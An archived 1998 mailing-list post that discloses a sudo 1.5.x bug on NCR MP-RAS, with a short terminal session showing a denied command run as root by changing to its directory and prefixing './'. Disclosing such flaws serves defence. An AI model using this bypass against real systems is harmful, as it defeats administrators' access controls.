There is a bug in sudo versions (at least) 1.5.2 and 1.5.3 on NCR's MP-RAS that makes it trivial to bypass sudo's restrictions. I reported this to the sudo-bugs address given in the source on 12/23/97, but never heard back, so screw 'em. It is important to note that MP-RAS is one of the platforms listed in the RUNSON file included with the distribution, so there are probably many people running this; I imagine you will want to reconsider it if you are one of them. Basically, if you define a command that a user is not allowed to run, they will still be allowed to run it if they cd to the directory containing the command and preface it with ./. Here's an example: /da8 atlas> sudo date Sorry, user osiris is not allowed to execute "/usr/bin/date" as root on atlas. /da8 atlas> sudo /bin/date Sorry, user osiris is not allowed to execute "/bin/date" as root on atlas. /da8 atlas> cd /usr/bin /usr/bin atlas> sudo ./date Mon Jan 12 12:15:34 EST 1998 I'm not sure if this problem affects any other platforms. I believe HP-UX 9.04 at least is safe. --jml
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:38:41 PDT